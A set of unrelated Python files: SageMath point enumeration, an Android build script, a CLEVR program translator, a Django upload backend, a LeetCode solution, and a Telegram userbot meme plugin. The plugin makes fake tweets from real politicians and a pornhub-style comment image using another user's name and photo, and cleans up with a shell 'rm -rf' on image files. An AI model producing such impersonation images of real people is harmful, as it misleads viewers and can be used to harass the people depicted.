R = PolynomialRing(BR, N, AS.gens(), order='lex')
I = R.ideal(X.defining_polynomials())
I0 = R.ideal(0)
#Determine the points through elimination
#This is much faster than using the I.variety() function on each affine chart.
G = I.groebner_basis()
if G != [1]:
P = {}
points = [P]
#work backwards from solving each equation for the possible
#values of the next coordinate
for i in range(len(G) - 1, -1, -1):
new_points = []
good = 0
for P in points:
#substitute in our dictionary entry that has the values
#of coordinates known so far. This results in a single
#variable polynomial (by elimination)
L = G[i].substitute(P)
if R(L).degree() > 0:
if numerical:
for pol in L.univariate_polynomial().roots(multiplicities=False):
r = L.variables()[0]
varindex = R.gens().index(r)
P.update({R.gen(varindex):pol})
new_points.append(copy(P))
good = 1
else:
L = L.factor()
#the linear factors give the possible rational values of
#this coordinate
for pol, pow in L:
if pol.degree() == 1 and len(pol.variables()) == 1:
good = 1
r = pol.variables()[0]
varindex = R.gens().index(r)
#add this coordinates information to
#each dictionary entry
P.update({R.gen(varindex):-pol.constant_coefficient() /
pol.monomial_coefficient(r)})
new_points.append(copy(P))
else:
new_points.append(P)
good = 1
if good:
points = new_points
#the dictionary entries now have values for all coordinates
#they are the rational solutions to the equations
#make them into affine points
for i in range(len(points)):
if numerical:
if len(points[i]) == N:
S = AS([points[i][R.gen(j)] for j in range(N)])
if all(g(list(S)) < zero_tol for g in X.defining_polynomials()):
rat_points.append(S)
else:
if len(points[i]) == N and I.subs(points[i]) == I0:
S = X([points[i][R.gen(j)] for j in range(N)])
rat_points.append(S)
rat_points = sorted(rat_points)
return rat_points
R = self.value_ring()
B = kwds.pop('bound', 0)
tol = kwds.pop('tolerance', 1e-2)
prec = kwds.pop('precision', 53)
if is_RationalField(R) or R == ZZ:
if not B > 0:
raise TypeError("a positive bound B (= %s) must be specified"%B)
from sage.schemes.affine.affine_rational_point import enum_affine_rational_field
return enum_affine_rational_field(self,B)
if R in NumberFields():
if not B > 0:
raise TypeError("a positive bound B (= %s) must be specified"%B)
from sage.schemes.affine.affine_rational_point import enum_affine_number_field
return enum_affine_number_field(self, bound=B, tolerance=tol, precision=prec)
elif is_FiniteField(R):
from sage.schemes.affine.affine_rational_point import enum_affine_finite_field
return enum_affine_finite_field(self)
else:
raise TypeError("unable to enumerate points over %s"%R)
def numerical_points(self, F=None, **kwds):
"""
Return some or all numerical approximations of rational points of an affine scheme.
This is for dimension 0 subschemes only and the points are determined
through a groebner calculation over the base ring and then numerically
approximating the roots of the resulting polynomials. If the base ring
is a number field, the embedding into ``F`` must be known.
INPUT:
``F`` - numerical ring
kwds:
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
OUTPUT: A list of points in the ambient space.
.. WARNING::
For numerically inexact fields the list of points returned may contain repeated
or be missing points due to tolerance.
EXAMPLES::
sage: K.<v> = QuadraticField(3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: X = A.subscheme([x^3 - v^2*y, y - v*x^2 + 3])
sage: L = X(K).numerical_points(F=RR); L # abs tol 1e-14
[(-1.18738247880014, -0.558021142104134),
(1.57693558184861, 1.30713548084184),
(4.80659931965815, 37.0162574656220)]
sage: L[0].codomain()
Affine Space of dimension 2 over Real Field with 53 bits of precision
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: len(X(QQ).numerical_points(F=ComplexField(100)))
4
::
sage: A.<x1, x2> = AffineSpace(QQ, 2)
sage: E = A.subscheme([30*x1^100 + 1000*x2^2 + 2000*x1*x2 + 1, x1 + x2])
sage: len(E(A.base_ring()).numerical_points(F=CDF, zero_tolerance=1e-9))
100
TESTS::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: X(QQ).numerical_points(F=QQ)
Traceback (most recent call last):
...
TypeError: F must be a numerical field
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: X = A.subscheme([y^2 - x^2 - 3*x, x^2 - 10*y])
sage: X(QQ).numerical_points(F=CC, zero_tolerance=-1)
Traceback (most recent call last):
...
ValueError: tolerance must be positive
"""
from sage.schemes.affine.affine_space import is_AffineSpace
if F is None:
F = CC
if F not in Fields() or not hasattr(F, 'precision'):
raise TypeError('F must be a numerical field')
X = self.codomain()
if X.base_ring() not in NumberFields():
raise TypeError('base ring must be a number field')
AA = X.ambient_space().change_ring(F)
if not is_AffineSpace(X) and X.base_ring() in Fields():
# Then X must be a subscheme
dim_ideal = X.defining_ideal().dimension()
if dim_ideal != 0: # no points
return []
else:
return []
# if X zero-dimensional
zero_tol = RR(kwds.pop('zero_tolerance', 10**(-10)))
if zero_tol <= 0:
raise ValueError("tolerance must be positive")
rat_points = []
PS = X.ambient_space()
N = PS.dimension_relative()
BR = X.base_ring()
# need a lexicographic ordering for elimination
R = PolynomialRing(BR, N, PS.gens(), order='lex')
RF = R.change_ring(F)
I = R.ideal(X.defining_polynomials())
# Determine the points through elimination This is much faster
# than using the I.variety() function on each affine chart.
G = I.groebner_basis()
G = [RF(g) for g in G]
if G != [1]:
P = {}
points = [P]
# work backwards from solving each equation for the possible
# values of the next coordinate
for g in reversed(G):
new_points = []
good = False
for P in points:
# substitute in our dictionary entry that has the
# values of coordinates known so far. This results
# in a single variable polynomial (by elimination)
L = g.substitute(P)
if len(RF(L).variables()) == 1:
r = L.variables()[0]
var = RF.gen(RF.gens().index(r))
for pol in L.univariate_polynomial().roots(ring=F,
multiplicities=False):
P[var] = pol
new_points.append(copy(P))
good = True
else:
new_points.append(P)
good = True
if good:
points = new_points
# the dictionary entries now have values for all
# coordinates they are the rational solutions to the
# equations make them into affine points
polys = [g.change_ring(F) for g in X.defining_polynomials()]
for P in points:
if len(P) == N:
S = AA([P[R.gen(j)] for j in range(N)])
if all(g(list(S)) < zero_tol for g in polys):
rat_points.append(S)
rat_points = sorted(rat_points)
return rat_points
|
import os
import shutil
import subprocess
import sys
import glob
APK_NAME = "vulkanTexturearray"
SHADER_DIR = "texturearray"
ASSETS_TEXTURES = ["texturearray_bc3_unorm.ktx", "texturearray_astc_8x8_unorm.ktx", "texturearray_etc2_unorm.ktx"]
if subprocess.call("ndk-build", shell=True) == 0:
print("Build successful")
# Assets
if not os.path.exists("./assets"):
os.makedirs("./assets")
# Shaders
# Base
if not os.path.exists("./assets/shaders/base"):
os.makedirs("./assets/shaders/base")
for file in glob.glob("../../data/shaders/base/*.spv"):
shutil.copy(file, "./assets/shaders/base")
# Sample
if not os.path.exists("./assets/shaders/%s" % SHADER_DIR):
os.makedirs("./assets/shaders/%s" % SHADER_DIR)
for file in glob.glob("../../data/shaders/%s/*.spv" %SHADER_DIR):
shutil.copy(file, "./assets/shaders/%s" % SHADER_DIR)
# Textures
if not os.path.exists("./assets/textures"):
os.makedirs("./assets/textures")
for file in ASSETS_TEXTURES:
shutil.copy("../../data/textures/%s" % file, "./assets/textures")
# Icon
if not os.path.exists("./res/drawable"):
os.makedirs("./res/drawable")
shutil.copy("../../android/images/icon.png", "./res/drawable")
if subprocess.call("ant debug -Dout.final.file=%s.apk" % APK_NAME, shell=True) == 0:
if len(sys.argv) > 1:
if sys.argv[1] == "-deploy":
if subprocess.call("adb install -r %s.apk" % APK_NAME, shell=True) != 0:
print("Could not deploy to device!")
else:
print("Error during build process!")
else:
print("Error building project!")
|
def sign_executable(executable_filename):
print("Signing '{}'".format(executable_filename))
|
import struct
fr = open("albums.db", "rb")
fr.seek(0,2) # seek end
flen = fr.tell()
fr.seek(0) # seek set
l = struct.unpack("I", fr.read(4))
l = l[0]
print "Found %d records" % l
print "File size should be:"
print " count 512"
print " tracks %d" % (l * 512) #struct.calcsize(track_struct_format))
print " index %d" % (4 * (l - 1))
print " ----"
print " total %d" % (l * (512 + 4) - 4)
print " actual %d" % flen
x = []
idx = []
for i in range(l):
fr.seek(512 * i)
d = fr.read(64)
d = d.strip("\x00")
x.append(d)
fr.seek(512 * l)
for i in range(l-1):
d = struct.unpack("I", fr.read(4))
idx.append(d[0])
print idx
print len(x)
n = 0
for v in idx:
print n, x[v]
n += 1
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : program_translator.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 09/30/2018
#
# This file is part of NSCL-PyTorch.
# Distributed under terms of the MIT license.
"""
Tools for translating programs into different formats.
"""
from copy import deepcopy
__all__ = ['clevr_to_nsclseq']
def get_clevr_pblock_op(block):
"""
Return the operation of a CLEVR program block.
"""
if 'type' in block:
return block['type']
assert 'function' in block
return block['function']
def get_clevr_op_attribute(op):
return op.split('_')[1]
def clevr_to_nsclseq(clevr_program):
nscl_program = list()
mapping = dict()
for block_id, block in enumerate(clevr_program):
op = get_clevr_pblock_op(block)
current = None
if op == 'scene':
current = dict(op='scene')
elif op.startswith('filter'):
concept = block['value_inputs'][0]
last = nscl_program[mapping[block['inputs'][0]]]
if last['op'] == 'filter':
last['concept'].append(concept)
else:
current = dict(op='filter', concept=[concept])
elif op.startswith('relate'):
concept = block['value_inputs'][0]
current = dict(op='relate', relational_concept=[concept])
elif op.startswith('same'):
attribute = get_clevr_op_attribute(op)
current = dict(op='relate_attribute_equal', attribute=attribute)
elif op in ('intersect', 'union'):
current = dict(op=op)
elif op == 'unique':
pass # We will ignore the unique operations.
else:
if op.startswith('query'):
if block_id == len(clevr_program) - 1:
attribute = get_clevr_op_attribute(op)
current = dict(op='query', attribute=attribute)
elif op.startswith('equal') and op != 'equal_integer':
attribute = get_clevr_op_attribute(op)
current = dict(op='query_attribute_equal', attribute=attribute)
elif op == 'exist':
current = dict(op='exist')
elif op == 'count':
if block_id == len(clevr_program) - 1:
current = dict(op='count')
elif op == 'equal_integer':
current = dict(op='count_equal')
elif op == 'less_than':
current = dict(op='count_less')
elif op == 'greater_than':
current = dict(op='count_greater')
else:
raise ValueError('Unknown CLEVR operation: {}.'.format(op))
if current is None:
assert len(block['inputs']) == 1
mapping[block_id] = mapping[block['inputs'][0]]
else:
current['inputs'] = list(map(mapping.get, block['inputs']))
if '_output' in block:
current['output'] = deepcopy(block['_output'])
nscl_program.append(current)
mapping[block_id] = len(nscl_program) - 1
return nscl_program
|
#!/usr/bin/env python
from io import BufferedWriter, FileIO
import os
from ajaxuploader.backends.base import AbstractUploadBackend
from django.conf import settings
from panda.api import DataUploadResource, RelatedUploadResource, UserResource
from panda.models import Dataset, DataUpload, RelatedUpload, UserProxy
class PANDAAbstractUploadBackend(AbstractUploadBackend):
"""
Customized backend to handle AJAX uploads.
"""
def update_filename(self, request, filename):
"""
Verify that the filename is unique, if it isn't append and iterate
a counter until it is.
"""
self._original_filename = filename
filename = self._original_filename
root, ext = os.path.splitext(self._original_filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
i = 1
while os.path.exists(path):
filename = '%s%i%s' % (root, i, ext)
path = os.path.join(settings.MEDIA_ROOT, filename)
i += 1
return filename
def setup(self, filename):
"""
Open the destination file for writing.
"""
self._path = os.path.join(settings.MEDIA_ROOT, filename)
try:
os.makedirs(os.path.realpath(os.path.dirname(self._path)))
except:
pass
self._dest = BufferedWriter(FileIO(self._path, "w"))
def upload_chunk(self, chunk):
"""
Write a chunk of data to the destination.
"""
self._dest.write(chunk)
def upload_complete(self, request, filename):
"""
Close the destination file.
"""
self._dest.close()
class PANDADataUploadBackend(PANDAAbstractUploadBackend):
"""
Backend specifically for DataUploads.
"""
def upload_complete(self, request, filename):
"""
Create a DataUpload object.
"""
try:
super(PANDADataUploadBackend, self).upload_complete(request, filename)
root, ext = os.path.splitext(filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
size = os.path.getsize(path)
if 'dataset_slug' in request.REQUEST:
dataset = Dataset.objects.get(slug=request.REQUEST['dataset_slug'])
else:
dataset = None
encoding = request.REQUEST.get('encoding', 'utf-8')
if not encoding:
encoding = 'utf-8'
# Because users may have authenticated via headers the request.user may
# not be a full User instance. To be sure, we fetch one.
creator = UserProxy.objects.get(id=request.user.id)
upload = DataUpload.objects.create(
filename=filename,
original_filename=self._original_filename,
size=size,
creator=creator,
dataset=dataset,
encoding=encoding)
if dataset:
dataset.update_full_text()
resource = DataUploadResource()
bundle = resource.build_bundle(obj=upload, request=request)
data = resource.full_dehydrate(bundle).data
# django-ajax-upoader does not use the Tastypie serializer
# so we must 'manually' serialize the embedded resource bundle
resource = UserResource()
bundle = data['creator']
user_data = resource.full_dehydrate(bundle).data
data['creator'] = user_data
except Exception, e:
# This global error handler is a kludge to ensure IE8 can properly handle the responses
return { 'error_message': e.message, 'success': False }
return data
class PANDARelatedUploadBackend(PANDAAbstractUploadBackend):
"""
Backend specifically for RelatedUploads.
"""
def upload_complete(self, request, filename):
"""
Create a RelatedUpload object.
"""
try:
super(PANDARelatedUploadBackend, self).upload_complete(request, filename)
root, ext = os.path.splitext(filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
size = os.path.getsize(path)
dataset = Dataset.objects.get(slug=request.REQUEST['dataset_slug'])
# Because users may have authenticated via headers the request.user may
# not be a full User instance. To be sure, we fetch one.
creator = UserProxy.objects.get(id=request.user.id)
upload = RelatedUpload.objects.create(
filename=filename,
original_filename=self._original_filename,
size=size,
creator=creator,
dataset=dataset)
dataset.update_full_text()
resource = RelatedUploadResource()
bundle = resource.build_bundle(obj=upload, request=request)
data = resource.full_dehydrate(bundle).data
# django-ajax-upoader does not use the Tastypie serializer
# so we must 'manually' serialize the embedded resource bundle
resource = UserResource()
bundle = data['creator']
user_data = resource.full_dehydrate(bundle).data
data['creator'] = user_data
except Exception, e:
# This global error handler is a kludge to ensure IE8 can properly handle the responses
return { 'error_message': e.message, 'success': False }
return data
|
#!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from enum import Enum
class Entity(Enum):
Location = "Location"
LocationType = "LocationType"
Equipment = "Equipment"
EquipmentType = "EquipmentType"
EquipmentPort = "EquipmentPort"
EquipmentPortType = "EquipmentPortType"
Link = "Link"
Service = "Service"
ServiceType = "ServiceType"
ServiceEndpoint = "ServiceEndpoint"
ServiceEndpointDefinition = "ServiceEndpointDefinition"
SiteSurvey = "SiteSurvey"
Customer = "Customer"
Document = "Document"
PropertyType = "PropertyType"
Property = "Property"
User = "User"
WorkOrder = "WorkOrder"
WorkOrderType = "WorkOrderType"
ProjectType = "ProjectType"
Project = "Project"
|
"""
Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
You must implement a solution with a linear runtime complexity and use only constant extra space.
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1
Constraints:
1 <= nums.length <= 3 * 104
-3 * 104 <= nums[i] <= 3 * 104
Each element in the array appears twice except for one element which appears only once.
"""
class Solution:
def singleNumber(self, nums: List[int]) -> int:
res = 0
for i in range(len(nums)):
res ^= nums[i]
return res
|
""" Some Modules Imported by @Nitesh_231 :) & Again @heyworld roks *_* """
import asyncio
import os
import re
import requests
from html_telegraph_poster.upload_images import upload_image
from PIL import Image, ImageDraw, ImageFont
from telegraph import exceptions, upload_file
from validators.url import url
from wget import download
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY, bot
from userbot.events import bdrl_cmd
from userbot.utils import bash, deEmojify
def convert_toimage(image):
img = Image.open(image)
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
os.remove(image)
return "temp.jpg"
async def threats(text):
r = requests.get(f"https://nekobot.xyz/api/imagegen?type=threats&url={text}").json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def trash(text):
r = requests.get(f"https://nekobot.xyz/api/imagegen?type=trash&url={text}").json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def trap(text1, text2, text3):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=trap&name={text1}&author={text2}&image={text3}"
).json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def phss(uplded, input, name):
web = requests.get(
f"https://nekobot.xyz/api/imagegen?type=phcomment&image={uplded}&text={input}&username={name}"
).json()
alf = web.get("message")
uri = url(alf)
if not uri:
return "check syntax once more"
with open("alf.png", "wb") as f:
f.write(requests.get(alf).content)
img = Image.open("alf.png").convert("RGB")
img.save("alf.jpg", "jpeg")
return "alf.jpg"
async def trumptweet(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=trumptweet&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def changemymind(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=changemymind&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def kannagen(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=kannagen&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.webp", "webp")
return "gpx.webp"
async def moditweet(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=tweet&text={text}&username=narendramodi"
).json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png").convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def tweets(text1, text2):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=tweet&text={text1}&username={text2}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def get_user_from_event(event):
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
user_obj = await event.client.get_entity(previous_message.from_id)
return user_obj
async def purge():
try:
await bash("rm -rf *.png *.webp")
except OSError:
pass
@bot.on(bdrl_cmd(outgoing=True, pattern=r"trump(?: |$)(.*)"))
async def trump(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
await event.edit("`Send you text to trump so he can tweet.`")
return
await event.edit("`Requesting trump to tweet...`")
text = deEmojify(text)
img = await trumptweet(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(pattern=r"modi(?: |$)(.*)", outgoing=True))
async def nekobot(event):
text = event.pattern_match.group(1)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
await event.edit("Send you text to modi so he can tweet.")
return
await event.edit("Requesting modi to tweet...")
text = deEmojify(text)
file = await moditweet(text)
await event.client.send_file(event.chat_id, file, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"cmm(?: |$)(.*)"))
async def cmm(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
await event.edit("`Give text for to write on banner!`")
return
await event.edit("`Your banner is under creation wait a sec...`")
text = deEmojify(text)
img = await changemymind(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"kanna(?: |$)(.*)"))
async def kanna(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
await event.edit("`What should kanna write give text!`")
return
await event.edit("`Kanna is writing your text...`")
text = deEmojify(text)
img = await kannagen(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"\.tweet(?: |$)(.*)"))
async def tweet(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply:
if not reply_to_id.media:
text = reply_to_id.message
else:
await event.edit("`What should i tweet? Give your username and tweet!`")
return
else:
await event.edit("What should i tweet? Give your username and tweet!`")
return
if "." in text:
username, text = text.split(".", 1)
else:
await event.edit("`What should i tweet? Give your username and tweet!`")
await event.edit(f"`Requesting {username} to tweet...`")
text = deEmojify(text)
img = await tweets(text, username)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(pattern=r"threat(?: |$)(.*)", outgoing=True))
async def nekobot(event):
replied = await event.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await event.edit("reply to a supported media file")
return
if replied.media:
await event.edit("passing to telegraph...")
else:
await event.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
await event.edit(
"the replied file size is not supported it must me below 5 mb"
)
os.remove(download_location)
return
await event.edit("generating image..")
else:
await event.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await event.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await threats(file)
await event.delete()
await bot.send_file(event.chat_id, file, reply_to=replied)
@bot.on(bdrl_cmd(pattern=r"trash(?: |$)(.*)", outgoing=True))
async def nekobot(event):
replied = await event.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await event.edit("reply to a supported media file")
return
if replied.media:
await event.edit("passing to telegraph...")
else:
await event.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
await event.edit(
"the replied file size is not supported it must me below 5 mb"
)
os.remove(download_location)
return
await event.edit("generating image..")
else:
await event.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await event.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await trash(file)
await event.delete()
await bot.send_file(event.chat_id, file, reply_to=replied)
@bot.on(bdrl_cmd(pattern=r"trap(?: |$)(.*)", outgoing=True))
async def nekobot(e):
input_str = e.pattern_match.group(1)
input_str = deEmojify(input_str)
if "|" in input_str:
text1, text2 = input_str.split("|")
else:
await e.edit(
"Balas Ke Gambar Atau Sticker Lalu Ketik `.trap (Nama Orang Yang Di Trap)|(Nama Trap)`"
)
return
replied = await e.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await e.edit("reply to a supported media file")
return
if replied.media:
await e.edit("passing to telegraph...")
else:
await e.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
await e.edit("the replied file size is not supported it must me below 5 mb")
os.remove(download_location)
return
await e.edit("generating image..")
else:
await e.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await e.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await trap(text1, text2, file)
await e.delete()
await bot.send_file(e.chat_id, file, reply_to=replied)
# Ported by @AshSTR
@bot.on(bdrl_cmd(outgoing=True, pattern=r"fgs ((.*) ; (.*))"))
async def FakeGoogleSearch(event):
"""Get a user-customised google search meme!"""
input_str = event.pattern_match.group(1)
if input_str is None:
await event.edit("No input found!", del_in=5)
return
if ";" in input_str:
search, result = input_str.split(";", 1)
else:
await event.edit("Invalid Input! Check help for more info!", del_in=5)
return
await event.edit("Connecting to `https://www.google.com/` ...")
await asyncio.sleep(2)
img = "https://i.imgur.com/wNFr5X2.jpg"
r = download(img)
photo = Image.open(r)
drawing = ImageDraw.Draw(photo)
blue = (0, 0, 255)
black = (0, 0, 0)
font1 = ImageFont.truetype("userbot/utils/styles/ProductSans-BoldItalic.ttf", 20)
font2 = ImageFont.truetype("userbot/utils/styles/ProductSans-Light.ttf", 23)
drawing.text((450, 258), result, fill=blue, font=font1)
drawing.text((270, 37), search, fill=black, font=font2)
photo.save("downloads/test.jpg")
reply = event.pattern_match.group(2)
await event.delete()
reply_id = event.pattern_match.group(3) if reply else None
await event.client.send_file(
event.chat_id, "downloads/test.jpg", reply_to_message_id=reply_id
)
os.remove("downloads/test.jpg")
@bot.on(bdrl_cmd(outgoing=True, pattern=r"ph(?: |$)(.*)"))
async def phcomment(event):
try:
await event.edit("`Processing..`")
text = event.pattern_match.group(1)
reply = await event.get_reply_message()
if reply:
user = await get_user_from_event(event)
if user.last_name:
name = user.first_name + " " + user.last_name
else:
name = user.first_name
text = text or str(reply.message)
elif text:
user = await bot.get_me()
if user.last_name:
name = user.first_name + " " + user.last_name
else:
name = user.first_name
else:
return await event.edit("`Give text..`")
try:
photo = await event.client.download_profile_photo(
user.id,
str(user.id) + ".png",
download_big=False,
)
uplded = upload_image(photo)
except BaseException:
uplded = "https://telegra.ph/file/7d110cd944d54f72bcc84.jpg"
except BaseException as e:
await purge()
return await event.edit(f"`Error: {e}`")
img = await phss(uplded, text, name)
try:
await event.client.send_file(
event.chat_id,
img,
reply_to=event.reply_to_msg_id,
)
except BaseException:
await purge()
return await event.edit("`Reply message has no text!`")
await event.delete()
await purge()
CMD_HELP.update(
{
"imgmeme": f"**Plugin : **`imgmeme`\
\n\n • **Syntax :** `{cmd}fgs`\
\n • **Function : **Meme dari search google yang di bisa custom user!\
\n • **Example : **`{cmd}fgs [Teks Atas] ; [Teks Bawah]`\
\n\n • **Syntax :** `{cmd}trump`\
\n • **Function : **Membuat Tweet dari akun twitter Donald Trump\
\n\n • **Syntax :** `{cmd}modi` <text>\
\n • **Function : **Membuat Tweet dari akun twitter @narendramodi\
\n\n • **Syntax :** `{cmd}cmm` <text>\
\n • **Function : **Membuat meme change my mind\
\n\n • **Syntax :** `{cmd}kanna` <text>\
\n • **Function : **Membuat meme tulisan dari nana anime bawa kertas\
\n\n • **Syntax :** `{cmd}ph` <text>\
\n • **Function : **Membuat Tweet dari website pornhub\
\n\n • **Syntax :** `{cmd}threat` <text> (sambil reply media foto/sticker)\
\n • **Function : **Membuat meme 3 hoax terbesar\
\n\n • **Syntax :** `{cmd}trash` <text> (sambil reply media foto/sticker)\
\n • **Function : **Membuat meme list sampah\
\n\n • **Syntax :** `{cmd}trap` <text> (sambil reply media foto/sticker)\
\n • **Function : **Membuat meme trapcard\
\n\n • **Syntax :** `{cmd}tweet`\
\n • **Function : **Membuat Tweet dari akun twitter\
\n • **Example : **{cmd}tweet @mrismanaziz.ganteng (harus pake . [titik])\
"
}
)
|
import sys
import json
from random import seed
from random import randint
import boto3
sys.path.insert(0, "../src")
import bioims
artifactClient = bioims.client('artifact')
# print(artifactClient.getLambdaArn())
# seed(1)
# mids=[]
# for i in range(10):
# artifact = {
# "contextId" : 'plate-'+str(i),
# "trainId" : 'train-id-'+str(i),
# "artifact" : 's3key#'+str(i),
# "s3bucket" : 's3bucket-'+str(i),
# "description" : 'type-'+str(i)
# }
# r = artifactClient.createArtifact(artifact)
# print(r)
# for i in range(10):
# r = artifactClient.getArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
# for i in range(10):
# artifact = {
# "contextId" : 'plate-'+str(i),
# "trainId" : 'train-id-'+str(i),
# "artifact" : 's3key#'+str(i)+'-2',
# "s3bucket" : 's3bucket-'+str(i),
# "description" : 'type-'+str(i)
# }
# r = artifactClient.createArtifact(artifact)
# print(r)
